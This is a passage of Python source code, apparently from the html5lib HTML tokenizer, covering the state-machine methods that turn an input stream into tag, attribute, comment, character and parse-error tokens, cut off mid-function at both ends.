self.tokenQueue.append({"type": tokenTypes["ParseError"], "data": "expected-named-entity"}) self.stream.unget(charStack.pop()) output = "&" + "".join(charStack) if fromAttribute: self.currentToken["data"][-1][1] += output else: if output in spaceCharacters: tokenType = "SpaceCharacters" else: tokenType = "Characters" self.tokenQueue.append({"type": tokenTypes[tokenType], "data": output}) def processEntityInAttribute(self, allowedChar): """This method replaces the need for "entityInAttributeValueState". """ self.consumeEntity(allowedChar=allowedChar, fromAttribute=True) def emitCurrentToken(self): """This method is a generic handler for emitting the tags. It also sets the state to "data" because that's what's needed after a token has been emitted. """ token = self.currentToken # Add token to the queue to be yielded if (token["type"] in tagTokenTypes): if self.lowercaseElementName: token["name"] = token["name"].translate(asciiUpper2Lower) if token["type"] == tokenTypes["EndTag"]: if token["data"]: self.tokenQueue.append({"type": tokenTypes["ParseError"], "data": "attributes-in-end-tag"}) if token["selfClosing"]: self.tokenQueue.append({"type": tokenTypes["ParseError"], "data": "self-closing-flag-on-end-tag"}) self.tokenQueue.append(token) self.state = self.dataState # Below are the various tokenizer states worked out. def dataState(self): data = self.stream.char() if data == "&": self.state = self.entityDataState elif data == "<": self.state = self.tagOpenState elif data == "\u0000": self.tokenQueue.append({"type": tokenTypes["ParseError"], "data": "invalid-codepoint"}) self.tokenQueue.append({"type": tokenTypes["Characters"], "data": "\u0000"}) elif data is EOF: # Tokenization ends. return False elif data in spaceCharacters: # Directly after emitting a token you switch back to the "data # state". At that point spaceCharacters are important so they are # emitted separately. self.tokenQueue.append({"type": tokenTypes["SpaceCharacters"], "data": data + self.stream.charsUntil(spaceCharacters, True)}) # No need to update lastFourChars here, since the first space will # have already been appended to lastFourChars and will have broken # any <!-- or --> sequences else: chars = self.stream.charsUntil(("&", "<", "\u0000")) self.tokenQueue.append({"type": tokenTypes["Characters"], "data": data + chars}) return True def entityDataState(self): self.consumeEntity() self.state = self.dataState return True def rcdataState(self): data = self.stream.char() if data == "&": self.state = self.characterReferenceInRcdata elif data == "<": self.state = self.rcdataLessThanSignState elif data == EOF: # Tokenization ends. return False elif data == "\u0000": self.tokenQueue.append({"type": tokenTypes["ParseError"], "data": "invalid-codepoint"}) self.tokenQueue.append({"type": tokenTypes["Characters"], "data": "\uFFFD"}) elif data in spaceCharacters: # Directly after emitting a token you switch back to the "data # state". At that point spaceCharacters are important so they are # emitted separately. self.tokenQueue.append({"type": tokenTypes["SpaceCharacters"], "data": data + self.stream.charsUntil(spaceCharacters, True)}) # No need to update lastFourChars here, since the first space will # have already been appended to lastFourChars and will have broken # any <!-- or --> sequences else: chars = self.stream.charsUntil(("&", "<", "\u0000")) self.tokenQueue.append({"type": tokenTypes["Characters"], "data": data + chars}) return True def characterReferenceInRcdata(self): self.consumeEntity() self.state = self.rcdataState return True def rawtextState(self): data = self.stream.char() if data == "<": self.state = self.rawtextLessThanSignState elif data == "\u0000": self.tokenQueue.append({"type": tokenTypes["ParseError"], "data": "invalid-codepoint"}) self.tokenQueue.append({"type": tokenTypes["Characters"], "data": "\uFFFD"}) elif data == EOF: # Tokenization ends. return False else: chars = self.stream.charsUntil(("<", "\u0000")) self.tokenQueue.append({"type": tokenTypes["Characters"], "data": data + chars}) return True def scriptDataState(self): data = self.stream.char() if data == "<": self.state = self.scriptDataLessThanSignState elif data == "\u0000": self.tokenQueue.append({"type": tokenTypes["ParseError"], "data": "invalid-codepoint"}) self.tokenQueue.append({"type": tokenTypes["Characters"], "data": "\uFFFD"}) elif data == EOF: # Tokenization ends. return False else: chars = self.stream.charsUntil(("<", "\u0000")) self.tokenQueue.append({"type": tokenTypes["Characters"], "data": data + chars}) return True def plaintextState(self): data = self.stream.char() if data == EOF: # Tokenization ends. return False elif data == "\u0000": self.tokenQueue.append({"type": tokenTypes["ParseError"], "data": "invalid-codepoint"}) self.tokenQueue.append({"type": tokenTypes["Characters"], "data": "\uFFFD"}) else: self.tokenQueue.append({"type": tokenTypes["Characters"], "data": data + self.stream.charsUntil("\u0000")}) return True def tagOpenState(self): data = self.stream.char() if data == "!": self.state = self.markupDeclarationOpenState elif data == "/": self.state = self.closeTagOpenState elif data in asciiLetters: self.currentToken = {"type": tokenTypes["StartTag"], "name": data, "data": [], "selfClosing": False, "selfClosingAcknowledged": False} self.state = self.tagNameState elif data == ">": # XXX In theory it could be something besides a tag name. But # do we really care? self.tokenQueue.append({"type": tokenTypes["ParseError"], "data": "expected-tag-name-but-got-right-bracket"}) self.tokenQueue.append({"type": tokenTypes["Characters"], "data": "<>"}) self.state = self.dataState elif data == "?": # XXX In theory it could be something besides a tag name. But # do we really care? self.tokenQueue.append({"type": tokenTypes["ParseError"], "data": "expected-tag-name-but-got-question-mark"}) self.stream.unget(data) self.state = self.bogusCommentState else: # XXX self.tokenQueue.append({"type": tokenTypes["ParseError"], "data": "expected-tag-name"}) self.tokenQueue.append({"type": tokenTypes["Characters"], "data": "<"}) self.stream.unget(data) self.state = self.dataState return True def closeTagOpenState(self): data = self.stream.char() if data in asciiLetters: self.currentToken = {"type": tokenTypes["EndTag"], "name": data, "data": [], "selfClosing": False} self.state = self.tagNameState elif data == ">": self.tokenQueue.append({"type": tokenTypes["ParseError"], "data": "expected-closing-tag-but-got-right-bracket"}) self.state = self.dataState elif data is EOF: self.tokenQueue.append({"type": tokenTypes["ParseError"], "data": "expected-closing-tag-but-got-eof"}) self.tokenQueue.append({"type": tokenTypes["Characters"], "data": "</"}) self.state = self.dataState else: # XXX data can be _'_... self.tokenQueue.append({"type": tokenTypes["ParseError"], "data": "expected-closing-tag-but-got-char", "datavars": {"data": data}}) self.stream.unget(data) self.state = self.bogusCommentState return True def tagNameState(self): data = self.stream.char() if data in spaceCharacters: self.state = self.beforeAttributeNameState elif data == ">": self.emitCurrentToken() elif data is EOF: self.tokenQueue.append({"type": tokenTypes["ParseError"], "data": "eof-in-tag-name"}) self.state = self.dataState elif data == "/": self.state = self.selfClosingStartTagState elif data == "\u0000": self.tokenQueue.append({"type": tokenTypes["ParseError"], "data": "invalid-codepoint"}) self.currentToken["name"] += "\uFFFD" else: self.currentToken["name"] += data # (Don't use charsUntil here, because tag names are # very short and it's faster to not do anything fancy) return True def rcdataLessThanSignState(self): data = self.stream.char() if data == "/": self.temporaryBuffer = "" self.state = self.rcdataEndTagOpenState else: self.tokenQueue.append({"type": tokenTypes["Characters"], "data": "<"}) self.stream.unget(data) self.state = self.rcdataState return True def rcdataEndTagOpenState(self): data = self.stream.char() if data in asciiLetters: self.temporaryBuffer += data self.state = self.rcdataEndTagNameState else: self.tokenQueue.append({"type": tokenTypes["Characters"], "data": "</"}) self.stream.unget(data) self.state = self.rcdataState return True def rcdataEndTagNameState(self): appropriate = self.currentToken and self.currentToken["name"].lower() == self.temporaryBuffer.lower() data = self.stream.char() if data in spaceCharacters and appropriate: self.currentToken = {"type": tokenTypes["EndTag"], "name": self.temporaryBuffer, "data": [], "selfClosing": False} self.state = self.beforeAttributeNameState elif data == "/" and appropriate: self.currentToken = {"type": tokenTypes["EndTag"], "name": self.temporaryBuffer, "data": [], "selfClosing": False} self.state = self.selfClosingStartTagState elif data == ">" and appropriate: self.currentToken = {"type": tokenTypes["EndTag"], "name": self.temporaryBuffer, "data": [], "selfClosing": False} self.emitCurrentToken() self.state = self.dataState elif data in asciiLetters: self.temporaryBuffer += data else: self.tokenQueue.append({"type": tokenTypes["Characters"], "data": "</" + self.temporaryBuffer}) self.stream.unget(data) self.state = self.rcdataState return True def rawtextLessThanSignState(self): data = self.stream.char() if data == "/": self.temporaryBuffer = "" self.state = self.rawtextEndTagOpenState else: self.tokenQueue.append({"type": tokenTypes["Characters"], "data": "<"}) self.stream.unget(data) self.state = self.rawtextState return True def rawtextEndTagOpenState(self): data = self.stream.char() if data in asciiLetters: self.temporaryBuffer += data self.state = self.rawtextEndTagNameState else: self.tokenQueue.append({"type": tokenTypes["Characters"], "data": "</"}) self.stream.unget(data) self.state = self.rawtextState return True def rawtextEndTagNameState(self): appropriate = self.currentToken and self.currentToken["name"].lower() == self.temporaryBuffer.lower() data = self.stream.char() if data in spaceCharacters and appropriate: self.currentToken = {"type": tokenTypes["EndTag"], "name": self.temporaryBuffer, "data": [], "selfClosing": False} self.state = self.beforeAttributeNameState elif data == "/" and appropriate: self.currentToken = {"type": tokenTypes["EndTag"], "name": self.temporaryBuffer, "data": [], "selfClosing": False} self.state = self.selfClosingStartTagState elif data == ">" and appropriate: self.currentToken = {"type": tokenTypes["EndTag"], "name": self.temporaryBuffer, "data": [], "selfClosing": False} self.emitCurrentToken() self.state = self.dataState elif data in asciiLetters: self.temporaryBuffer += data else: self.tokenQueue.append({"type": tokenTypes["Characters"], "data": "</" + self.temporaryBuffer}) self.stream.unget(data) self.state = self.rawtextState return True def scriptDataLessThanSignState(self): data = self.stream.char() if data == "/": self.temporaryBuffer = "" self.state = self.scriptDataEndTagOpenState elif data == "!": self.tokenQueue.append({"type": tokenTypes["Characters"], "data": "<!"}) self.state = self.scriptDataEscapeStartState else: self.tokenQueue.append({"type": tokenTypes["Characters"], "data": "<"}) self.stream.unget(data) self.state = self.scriptDataState return True def scriptDataEndTagOpenState(self): data = self.stream.char() if data in asciiLetters: self.temporaryBuffer += data self.state = self.scriptDataEndTagNameState else: self.tokenQueue.append({"type": tokenTypes["Characters"], "data": "</"}) self.stream.unget(data) self.state = self.scriptDataState return True def scriptDataEndTagNameState(self): appropriate = self.currentToken and self.currentToken["name"].lower() == self.temporaryBuffer.lower() data = self.stream.char() if data in spaceCharacters and appropriate: self.currentToken = {"type": tokenTypes["EndTag"], "name": self.temporaryBuffer, "data": [], "selfClosing": False} self.state = self.beforeAttributeNameState elif data == "/" and appropriate: self.currentToken = {"type": tokenTypes["EndTag"], "name": self.temporaryBuffer, "data": [], "selfClosing": False} self.state = self.selfClosingStartTagState elif data == ">" and appropriate: self.currentToken = {"type": tokenTypes["EndTag"], "name": self.temporaryBuffer, "data": [], "selfClosing": False} self.emitCurrentToken() self.state = self.dataState elif data in asciiLetters: self.temporaryBuffer += data else: self.tokenQueue.append({"type": tokenTypes["Characters"], "data": "</" + self.temporaryBuffer}) self.stream.unget(data) self.state = self.scriptDataState return True def scriptDataEscapeStartState(self): data = self.stream.char() if data == "-": self.tokenQueue.append({"type": tokenTypes["Characters"], "data": "-"}) self.state = self.scriptDataEscapeStartDashState else: self.stream.unget(data) self.state = self.scriptDataState return True def scriptDataEscapeStartDashState(self): data = self.stream.char() if data == "-": self.tokenQueue.append({"type": tokenTypes["Characters"], "data": "-"}) self.state = self.scriptDataEscapedDashDashState else: self.stream.unget(data) self.state = self.scriptDataState return True def scriptDataEscapedState(self): data = self.stream.char() if data == "-": self.tokenQueue.append({"type": tokenTypes["Characters"], "data": "-"}) self.state = self.scriptDataEscapedDashState elif data == "<": self.state = self.scriptDataEscapedLessThanSignState elif data == "\u0000": self.tokenQueue.append({"type": tokenTypes["ParseError"], "data": "invalid-codepoint"}) self.tokenQueue.append({"type": tokenTypes["Characters"], "data": "\uFFFD"}) elif data == EOF: self.state = self.dataState else: chars = self.stream.charsUntil(("<", "-", "\u0000")) self.tokenQueue.append({"type": tokenTypes["Characters"], "data": data + chars}) return True def scriptDataEscapedDashState(self): data = self.stream.char() if data == "-": self.tokenQueue.append({"type": tokenTypes["Characters"], "data": "-"}) self.state = self.scriptDataEscapedDashDashState elif data == "<": self.state = self.scriptDataEscapedLessThanSignState elif data == "\u0000": self.tokenQueue.append({"type": tokenTypes["ParseError"], "data": "invalid-codepoint"}) self.tokenQueue.append({"type": tokenTypes["Characters"], "data": "\uFFFD"}) self.state = self.scriptDataEscapedState elif data == EOF: self.state = self.dataState else: self.tokenQueue.append({"type": tokenTypes["Characters"], "data": data}) self.state = self.scriptDataEscapedState return True def scriptDataEscapedDashDashState(self): data = self.stream.char() if data == "-": self.tokenQueue.append({"type": tokenTypes["Characters"], "data": "-"}) elif data == "<": self.state = self.scriptDataEscapedLessThanSignState elif data == ">": self.tokenQueue.append({"type": tokenTypes["Characters"], "data": ">"}) self.state = self.scriptDataState elif data == "\u0000": self.tokenQueue.append({"type": tokenTypes["ParseError"], "data": "invalid-codepoint"}) self.tokenQueue.append({"type": tokenTypes["Characters"], "data": "\uFFFD"}) self.state = self.scriptDataEscapedState elif data == EOF: self.state = self.dataState else: self.tokenQueue.append({"type": tokenTypes["Characters"], "data": data}) self.state = self.scriptDataEscapedState return True def scriptDataEscapedLessThanSignState(self): data = self.stream.char() if data == "/": self.temporaryBuffer = "" self.state = self.scriptDataEscapedEndTagOpenState elif data in asciiLetters: self.tokenQueue.append({"type": tokenTypes["Characters"], "data": "<" + data}) self.temporaryBuffer = data self.state = self.scriptDataDoubleEscapeStartState else: self.tokenQueue.append({"type": tokenTypes["Characters"], "data": "<"}) self.stream.unget(data) self.state = self.scriptDataEscapedState return True def scriptDataEscapedEndTagOpenState(self): data = self.stream.char() if data in asciiLetters: self.temporaryBuffer = data self.state = self.scriptDataEscapedEndTagNameState else: self.tokenQueue.append({"type": tokenTypes["Characters"], "data": "</"}) self.stream.unget(data) self.state = self.scriptDataEscapedState return True def scriptDataEscapedEndTagNameState(self): appropriate = self.currentToken and self.currentToken["name"].lower() == self.temporaryBuffer.lower() data = self.stream.char() if data in spaceCharacters and appropriate: self.currentToken = {"type": tokenTypes["EndTag"], "name": self.temporaryBuffer, "data": [], "selfClosing": False} self.state = self.beforeAttributeNameState elif data == "/" and appropriate: self.currentToken = {"type": tokenTypes["EndTag"], "name": self.temporaryBuffer, "data": [], "selfClosing": False} self.state = self.selfClosingStartTagState elif data == ">" and appropriate: self.currentToken = {"type": tokenTypes["EndTag"], "name": self.temporaryBuffer, "data": [], "selfClosing": False} self.emitCurrentToken() self.state = self.dataState elif data in asciiLetters: self.temporaryBuffer += data else: self.tokenQueue.append({"type": tokenTypes["Characters"], "data": "</" + self.temporaryBuffer}) self.stream.unget(data) self.state = self.scriptDataEscapedState return True def scriptDataDoubleEscapeStartState(self): data = self.stream.char() if data in (spaceCharacters | frozenset(("/", ">"))): self.tokenQueue.append({"type": tokenTypes["Characters"], "data": data}) if self.temporaryBuffer.lower() == "script": self.state = self.scriptDataDoubleEscapedState else: self.state = self.scriptDataEscapedState elif data in asciiLetters: self.tokenQueue.append({"type": tokenTypes["Characters"], "data": data}) self.temporaryBuffer += data else: self.stream.unget(data) self.state = self.scriptDataEscapedState return True def scriptDataDoubleEscapedState(self): data = self.stream.char() if data == "-": self.tokenQueue.append({"type": tokenTypes["Characters"], "data": "-"}) self.state = self.scriptDataDoubleEscapedDashState elif data == "<": self.tokenQueue.append({"type": tokenTypes["Characters"], "data": "<"}) self.state = self.scriptDataDoubleEscapedLessThanSignState elif data == "\u0000": self.tokenQueue.append({"type": tokenTypes["ParseError"], "data": "invalid-codepoint"}) self.tokenQueue.append({"type": tokenTypes["Characters"], "data": "\uFFFD"}) elif data == EOF: self.tokenQueue.append({"type": tokenTypes["ParseError"], "data": "eof-in-script-in-script"}) self.state = self.dataState else: self.tokenQueue.append({"type": tokenTypes["Characters"], "data": data}) return True def scriptDataDoubleEscapedDashState(self): data = self.stream.char() if data == "-": self.tokenQueue.append({"type": tokenTypes["Characters"], "data": "-"}) self.state = self.scriptDataDoubleEscapedDashDashState elif data == "<": self.tokenQueue.append({"type": tokenTypes["Characters"], "data": "<"}) self.state = self.scriptDataDoubleEscapedLessThanSignState elif data == "\u0000": self.tokenQueue.append({"type": tokenTypes["ParseError"], "data": "invalid-codepoint"}) self.tokenQueue.append({"type": tokenTypes["Characters"], "data": "\uFFFD"}) self.state = self.scriptDataDoubleEscapedState elif data == EOF: self.tokenQueue.append({"type": tokenTypes["ParseError"], "data": "eof-in-script-in-script"}) self.state = self.dataState else: self.tokenQueue.append({"type": tokenTypes["Characters"], "data": data}) self.state = self.scriptDataDoubleEscapedState return True def scriptDataDoubleEscapedDashDashState(self): data = self.stream.char() if data == "-": self.tokenQueue.append({"type": tokenTypes["Characters"], "data": "-"}) elif data == "<": self.tokenQueue.append({"type": tokenTypes["Characters"], "data": "<"}) self.state = self.scriptDataDoubleEscapedLessThanSignState elif data == ">": self.tokenQueue.append({"type": tokenTypes["Characters"], "data": ">"}) self.state = self.scriptDataState elif data == "\u0000": self.tokenQueue.append({"type": tokenTypes["ParseError"], "data": "invalid-codepoint"}) self.tokenQueue.append({"type": tokenTypes["Characters"], "data": "\uFFFD"}) self.state = self.scriptDataDoubleEscapedState elif data == EOF: self.tokenQueue.append({"type": tokenTypes["ParseError"], "data": "eof-in-script-in-script"}) self.state = self.dataState else: self.tokenQueue.append({"type": tokenTypes["Characters"], "data": data}) self.state = self.scriptDataDoubleEscapedState return True def scriptDataDoubleEscapedLessThanSignState(self): data = self.stream.char() if data == "/": self.tokenQueue.append({"type": tokenTypes["Characters"], "data": "/"}) self.temporaryBuffer = "" self.state = self.scriptDataDoubleEscapeEndState else: self.stream.unget(data) self.state = self.scriptDataDoubleEscapedState return True def scriptDataDoubleEscapeEndState(self): data = self.stream.char() if data in (spaceCharacters | frozenset(("/", ">"))): self.tokenQueue.append({"type": tokenTypes["Characters"], "data": data}) if self.temporaryBuffer.lower() == "script": self.state = self.scriptDataEscapedState else: self.state = self.scriptDataDoubleEscapedState elif data in asciiLetters: self.tokenQueue.append({"type": tokenTypes["Characters"], "data": data}) self.temporaryBuffer += data else: self.stream.unget(data) self.state = self.scriptDataDoubleEscapedState return True def beforeAttributeNameState(self): data = self.stream.char() if data in spaceCharacters: self.stream.charsUntil(spaceCharacters, True) elif data in asciiLetters: self.currentToken["data"].append([data, ""]) self.state = self.attributeNameState elif data == ">": self.emitCurrentToken() elif data == "/": self.state = self.selfClosingStartTagState elif data in ("'", '"', "=", "<"): self.tokenQueue.append({"type": tokenTypes["ParseError"], "data": "invalid-character-in-attribute-name"}) self.currentToken["data"].append([data, ""]) self.state = self.attributeNameState elif data == "\u0000": self.tokenQueue.append({"type": tokenTypes["ParseError"], "data": "invalid-codepoint"}) self.currentToken["data"].append(["\uFFFD", ""]) self.state = self.attributeNameState elif data is EOF: self.tokenQueue.append({"type": tokenTypes["ParseError"], "data": "expected-attribute-name-but-got-eof"}) self.state = self.dataState else: self.currentToken["data"].append([data, ""]) self.state = self.attributeNameState return True def attributeNameState(self): data = self.stream.char() leavingThisState = True emitToken = False if data == "=": self.state = self.beforeAttributeValueState elif data in asciiLetters: self.currentToken["data"][-1][0] += data +\ self.stream.charsUntil(asciiLetters, True) leavingThisState = False elif data == ">": # XXX If we emit here the attributes are converted to a dict # without being checked and when the code below runs we error # because data is a dict not a list emitToken = True elif data in spaceCharacters: self.state = self.afterAttributeNameState elif data == "/": self.state = self.selfClosingStartTagState elif data == "\u0000": self.tokenQueue.append({"type": tokenTypes["ParseError"], "data": "invalid-codepoint"}) self.currentToken["data"][-1][0] += "\uFFFD" leavingThisState = False elif data in ("'", '"', "<"): self.tokenQueue.append({"type": tokenTypes["ParseError"], "data": "invalid-character-in-attribute-name"}) self.currentToken["data"][-1][0] += data leavingThisState = False elif data is EOF: self.tokenQueue.append({"type": tokenTypes["ParseError"], "data": "eof-in-attribute-name"}) self.state = self.dataState else: self.currentToken["data"][-1][0] += data leavingThisState = False if leavingThisState: # Attributes are not dropped at this stage. That happens when the # start tag token is emitted so values can still be safely appended # to attributes, but we do want to report the parse error in time. if self.lowercaseAttrName: self.currentToken["data"][-1][0] = ( self.currentToken["data"][-1][0].translate(asciiUpper2Lower)) for name, value in self.currentToken["data"][:-1]: if self.currentToken["data"][-1][0] == name: self.tokenQueue.append({"type": tokenTypes["ParseError"], "data": "duplicate-attribute"}) break # XXX Fix for above XXX if emitToken: self.emitCurrentToken() return True def afterAttributeNameState(self): data = self.stream.char() if data in spaceCharacters: self.stream.charsUntil(spaceCharacters, True) elif data == "=": self.state = self.beforeAttributeValueState elif data == ">": self.emitCurrentToken() elif data in asciiLetters: self.currentToken["data"].append([data, ""]) self.state = self.attributeNameState elif data == "/": self.state = self.selfClosingStartTagState elif data == "\u0000": self.tokenQueue.append({"type": tokenTypes["ParseError"], "data": "invalid-codepoint"}) self.currentToken["data"].append(["\uFFFD", ""]) self.state = self.attributeNameState elif data in ("'", '"', "<"): self.tokenQueue.append({"type": tokenTypes["ParseError"], "data": "invalid-character-after-attribute-name"}) self.currentToken["data"].append([data, ""]) self.state = self.attributeNameState elif data is EOF: self.tokenQueue.append({"type": tokenTypes["ParseError"], "data": "expected-end-of-tag-but-got-eof"}) self.state = self.dataState else: self.currentToken["data"].append([data, ""]) self.state = self.attributeNameState return True def beforeAttributeValueState(self): data = self.stream.char() if data in spaceCharacters: self.stream.charsUntil(spaceCharacters, True) elif data == "\"": self.state = self.attributeValueDoubleQuotedState elif data == "&": self.state = self.attributeValueUnQuotedState self.stream.unget(data) elif data == "'": self.state = self.attributeValueSingleQuotedState elif data == ">": self.tokenQueue.append({"type": tokenTypes["ParseError"], "data": "expected-attribute-value-but-got-right-bracket"}) self.emitCurrentToken() elif data == "\u0000": self.tokenQueue.append({"type": tokenTypes["ParseError"], "data": "invalid-codepoint"}) self.currentToken["data"][-1][1] += "\uFFFD" self.state = self.attributeValueUnQuotedState elif data in ("=", "<", "`"): self.tokenQueue.append({"type": tokenTypes["ParseError"], "data": "equals-in-unquoted-attribute-value"}) self.currentToken["data"][-1][1] += data self.state = self.attributeValueUnQuotedState elif data is EOF: self.tokenQueue.append({"type": tokenTypes["ParseError"], "data": "expected-attribute-value-but-got-eof"}) self.state = self.dataState else: self.currentToken["data"][-1][1] += data self.state = self.attributeValueUnQuotedState return True def attributeValueDoubleQuotedState(self): data = self.stream.char() if data == "\"": self.state = self.afterAttributeValueState elif data == "&": self.processEntityInAttribute('"') elif data == "\u0000": self.tokenQueue.append({"type": tokenTypes["ParseError"], "data": "invalid-codepoint"}) self.currentToken["data"][-1][1] += "\uFFFD" elif data is EOF: self.tokenQueue.append({"type": tokenTypes["ParseError"], "data": "eof-in-attribute-value-double-quote"}) self.state = self.dataState else: self.currentToken["data"][-1][1] += data +\ self.stream.charsUntil(("\"", "&", "\u0000")) return True def attributeValueSingleQuotedState(self): data = self.stream.char() if data == "'": self.state = self.afterAttributeValueState elif data == "&": self.processEntityInAttribute("'") elif data == "\u0000": self.tokenQueue.append({"type": tokenTypes["ParseError"], "data": "invalid-codepoint"}) self.currentToken["data"][-1][1] += "\uFFFD" elif data is EOF: self.tokenQueue.append({"type": tokenTypes["ParseError"], "data": "eof-in-attribute-value-single-quote"}) self.state = self.dataState else: self.currentToken["data"][-1][1] += data +\ self.stream.charsUntil(("'", "&", "\u0000")) return True def attributeValueUnQuotedState(self): data = self.stream.char() if data in spaceCharacters: self.state = self.beforeAttributeNameState elif data == "&": self.processEntityInAttribute(">") elif data == ">": self.emitCurrentToken() elif data in ('"', "'", "=", "<", "`"): self.tokenQueue.append({"type": tokenTypes["ParseError"], "data": "unexpected-character-in-unquoted-attribute-value"}) self.currentToken["data"][-1][1] += data elif data == "\u0000": self.tokenQueue.append({"type": tokenTypes["ParseError"], "data": "invalid-codepoint"}) self.currentToken["data"][-1][1] += "\uFFFD" elif data is EOF: self.tokenQueue.append({"type": tokenTypes["ParseError"], "data": "eof-in-attribute-value-no-quotes"}) self.state = self.dataState else: self.currentToken["data"][-1][1] += data + self.stream.charsUntil( frozenset(("&", ">", '"', "'", "=", "<", "`", "\u0000")) | spaceCharacters) return True def afterAttributeValueState(self): data = self.stream.char() if data in spaceCharacters: self.state = self.beforeAttributeNameState elif data == ">": self.emitCurrentToken() elif data == "/": self.state = self.selfClosingStartTagState elif data is EOF: self.tokenQueue.append({"type": tokenTypes["ParseError"], "data": "unexpected-EOF-after-attribute-value"}) self.stream.unget(data) self.state = self.dataState else: self.tokenQueue.append({"type": tokenTypes["ParseError"], "data": "unexpected-character-after-attribute-value"}) self.stream.unget(data) self.state = self.beforeAttributeNameState return True def selfClosingStartTagState(self): data = self.stream.char() if data == ">": self.currentToken["selfClosing"] = True self.emitCurrentToken() elif data is EOF: self.tokenQueue.append({"type": tokenTypes["ParseError"], "data": "unexpected-EOF-after-solidus-in-tag"}) self.stream.unget(data) self.state = self.dataState else: self.tokenQueue.append({"type": tokenTypes["ParseError"], "data": "unexpected-character-after-solidus-in-tag"}) self.stream.unget(data) self.state = self.beforeAttributeNameState return True def bogusCommentState(self): # Make a new comment token and give it as value all the characters # until the first > or EOF (charsUntil checks for EOF automatically) # and emit it. data = self.stream.charsUntil(">") data = data.replace("\u0000", "\uFFFD") self.tokenQueue.append( {"type": tokenTypes["Comment"], "data": data}) # Eat the character directly after the bogus comment which is either a # ">" or an EOF. self.stream.char() self.state = self.dataState return True def markupDeclarationOpenState(self): charStack = [self.stream.char()] if charStack[-1] == "-": charStack.append(self.stream.char()) if charStack[-1] == "-": self.currentToken = {"type": tokenTypes["Comment"], "data": ""} self.state = self.commentStartState return True elif charStack[-1] in ('d', 'D'): matched = True for expected in (('o', 'O'), ('c', 'C'), ('t', 'T'), ('y', 'Y'), ('p', 'P'), ('e', 'E')): charStack.append(self.stream.char()) if charStack[-1] not in expected: matched = False break if matched: self.currentToken = {"type": tokenTypes["Doctype"], "name": "", "publicId": None, "systemId": None, "correct": True} self.state = self.doctypeState return True elif (charStack[-1] == "[" and self.parser is not None and self.parser.tree.openElements and self.parser.tree.openElements[-1].namespace != self.parser.tree.defaultNamespace): matched = True for expected in ["C", "D", "A", "T", "A", "["]: charStack.append(self.stream.char()) if charStack[-1] != expected: matched = False break if matched: self.state = self.cdataSectionState return True self.tokenQueue.append({"type": tokenTypes["ParseError"], "data": "expected-dashes-or-doctype"}) while charStack: self.stream.unget(charStack.pop()) self.state = self.bogusCommentState return True def commentStartState(self): data = self.stream.char() if data == "-": self.state = self.commentStartDashState elif data == "\u0000": self.tokenQueue.append({"type": tokenTypes["ParseError"], "data": "invalid-codepoint"}) self.currentToken["data"] += "\uFFFD" elif data == ">": self.tokenQueue.append({"type": tokenTypes["ParseError"], "data": "incorrect-comment"}) self.tokenQueue.append(self.currentToken) self.state = self.dataState elif data is EOF: self.tokenQueue.append({"type": tokenTypes["ParseError"], "data": "eof-in-comment"}) self.tokenQueue.append(self.currentToken) self.state = self.dataState else: self.currentToken["data"] += data self.state = self.commentState return True def commentStartDashState(self): data = self.stream.char() if data == "-": self.state = self.commentEndState elif data == "\u0000": self.tokenQueue.append({"type": tokenTypes["ParseError"], "data": "invalid-codepoint"}) self.currentToken["data"] += "-\uFFFD" elif data == ">": self.tokenQueue.append({"type": tokenTypes["ParseError"], "data": "incorrect-comment"}) self.tokenQueue.append(self.currentToken) self.state = self.dataState elif data is EOF: self.tokenQueue.append({"type": tokenTypes["ParseError"], "data": "eof-in-comment"}) self.tokenQueue.append(self.currentToken) self.state = self.dataState else: self.currentToken["data"] += "-" + data self.state = self.commentState return True def commentState(self): data = self.stream.char() if data == "-": self.state = self.commentEndDashState elif data == "\u0000": self.tokenQueue.append({"type": tokenTypes["ParseError"], "data": "invalid-codepoint"}) self.currentToken["data"] += "\uFFFD" elif data is EOF: self.tokenQueue.append({"type": tokenTypes["ParseError"], "data": "eof-in-comment"}) self.tokenQueue.append(self.currentToken) self.state = self.dataState else: self.currentToken["data"] += data + \ self.stream.charsUntil(("-", "\u0000")) return True def commentEndDashState(self): data = self.stream.char() if data == "-": self.state = self.commentEndState elif data == "\u0000": self.tokenQueue.append({"type": tokenTypes["ParseError"], "data": "invalid-codepoint"}) self.currentToken["data"] += "-\uFFFD" self.state = self.commentState elif data is EOF: self.tokenQueue.append({"type": tokenTypes["ParseError"], "data": "eof-in-comment-end-dash"}) self.tokenQueue.append(self.currentToken) self.state = self.dataState else: self.currentToken["data"] += "-" + data self.state = self.commentState return True def commentEndState(self): data = self.stream.char() if data == ">": self.tokenQueue.append(self.currentToken) self.state = self.dataState elif data == "\u0000": self.tokenQueue.append({"type": tokenTypes["ParseError"], "data": "invalid-codepoint"}) self.currentToken["data"] += "--\uFFFD" self.state = self.commentState elif data == "!": self.tokenQueue.append({"type": tokenTypes["ParseError"], "data": "unexpected-bang-after-double-dash-in-comment"}) self.state = self.commentEndBangState elif data == "-": self.tokenQueue.append({"type": tokenTypes["ParseError"], "data": "unexpected-dash-after-double-dash-in-comment"}) self.currentToken["data"] += data elif data is EOF: self.tokenQueue.append({"type": tokenTypes["ParseError"], "data": "eof-in-comment-double-dash"}) self.tokenQueue.append(self.currentToken) self.state = self.dataState else: # XXX self.tokenQueue.append({"type": tokenTypes["ParseError"], "data": "unexpected-char-in-comment"}) self.currentToken["data"] += "--" + data self.state = self.commentState return True def commentEndBangState(self): data = self.stream.char() if data == ">": self.tokenQueue.append(self.currentToken) self.state = self.dataState elif data == "-": self.currentToken["data"] += "--!" self.state = self.commentEndDashState elif data == "\u0000": self.tokenQueue.append({"type": tokenTypes["ParseError"], "data": "invalid-codepoint"}) self.currentToken["data"] += "--!\uFFFD" self.state = self.commentState elif data is EOF: self.tokenQueue.append({"type": tokenTypes["ParseError"], "data": "eof-in-comment-end-bang-state"}) self.tokenQueue.append(self.currentToken) self.state = self.dataState else: self.currentToken["data"] += "--!" + data self.state = self.commentState return True def doctypeState(self): data = self.stream.char() if data in spaceCharacters: self.state = self.beforeDoctypeNameState elif data is EOF: self.tokenQueue.append({"type": tokenTypes["ParseError"], "data": "expected-doctype-name-but-got-eof"}) self.currentToken["correct"] = False self.tokenQueue.append(self.currentToken) self.state = self.dataState else: self.tokenQueue.append({"type": tokenTypes["ParseError"], "data": "need-space-after-doctype"}) self.stream.unget(data) self.state = self.beforeDoctypeNameState return True def beforeDoctypeNameState(self): data = self.stream.char() if data in spaceCharacters: pass elif data == ">": self.tokenQueue.append({"type": tokenTypes["ParseError"], "data": "expected-doctype-name-but-got-right-bracket"}) self.currentToken["correct"] = 